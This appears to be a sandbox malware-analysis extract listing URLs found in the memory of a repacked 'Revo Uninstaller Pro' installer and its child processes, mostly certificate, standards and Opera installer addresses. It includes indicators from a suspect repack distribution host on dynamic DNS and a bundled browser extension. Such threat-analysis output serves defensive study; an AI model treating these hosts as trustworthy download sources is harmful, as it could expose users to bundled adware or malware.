      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0=
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdfS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdfS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://localhost:3001api/prefs/?product=$1&version=$2..
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000000.1750050502.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000003.1970159457.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PACK.EXE, 00000010.00000003.2198109948.0000000002E54000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199870901.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2198460363.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199605579.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, PACK.EXE, 00000010.00000003.2199929800.0000000000C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0A
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0W
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://ocsp.digicert.com0X
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repacks.ddns.nethttps://repack.me/ad.htmlopen
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2776929770.0000000000663000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repacks.ddns.netopen
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C8A000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/http/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/SV
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc1321
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4648S
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: ruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.Licence-Protector.com
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.aiim.org/pdfa/ns/id/
      Source: ruplp.exe, 0000000A.00000000.2100083068.0000000000D87000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.animation.arthouse.org
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesA
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesa
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.borland.com/rootpart.xml
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.color.org
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.csrc.nist.gov/publications/fips/fips197/fips-197.pdfS
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000003890000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.000000000569D000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.ietf.org/rfc/rfc3447.txtS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.itl.nist.gov/fipspubs/fip180-1.htm
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmp, ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.mirage-systems.de/
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.mirage-systems.de/%operationName%
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/%operationName%A_
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/Q
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/a
      Source: ruplp.exe, 0000000A.00000003.2102817735.0000000002C91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.mirage-systems.de/tq
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.movable-type.co.uk/scripts/xxtea.pdfS
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://www.opera.com0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004072000.00000004.00000020.00020000.00000000.sdmp, Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006045000.00000004.00000020.00020000.00000000.sdmp, RevoUninPro.exe, 00000009.00000000.2018481789.000000014095B000.00000002.00000001.01000000.0000000C.sdmp, RevoUninPro.exe, 0000000C.00000000.2134444155.000000014095B000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.revouninstaller.com
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.revouninstaller.com/)
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.schneier.com/paper-blowfish-fse.htmlS
      Source: ruplp.exe, 0000000A.00000000.2096953602.000000000041D000.00000020.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.schneier.com/paper-twofish-paper.pdfS
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000004DC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vsrevogroup.com
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000006F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.word-pdf-converter.com/5.67B160777-E232-46C5-8DC0-5BC8B49E77496.1
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://addons.opera.com/en/extensions/details/dify-cashback/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://addons.opera.com/extensions/download/be76331b95dfc399cd776d2fc68021e0db03cc4f.opera.com
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://autoupdate.geo.opera.com/https://autoupdate.opera.com/me/OperaDesktophttps://crashstats-coll
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://autoupdate.opera.com/me/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashpad.chromium.org/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashpad.chromium.org/bug/new
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://crashstats-collector-2.opera.com/
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000002E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://download.opera.com/download/get/?partner=www&opsys=Windows&utm_source=netinstaller
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://features.opera-api2.com/api/v2/features?country=%s&language=%s&uuid=%s&product=%s&channel=%s
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io)
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io/en/education.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://gamemaker.io/en/get.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://help.instagram.com/581066165581870;
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://help.opera.com/latest/
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/eula/computers
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/privacy
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/privacy.
      Source: setup.exe, 0000001D.00000000.2721982112.000000000012A000.00000002.00000001.01000000.00000019.sdmp, setup.exe, 0000001E.00000001.2731861623.00000000001EA000.00000002.00000001.01000000.0000001C.sdmp, setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/terms
      Source: setup.exe, 00000020.00000000.2749093578.000000000012A000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://legal.opera.com/terms.
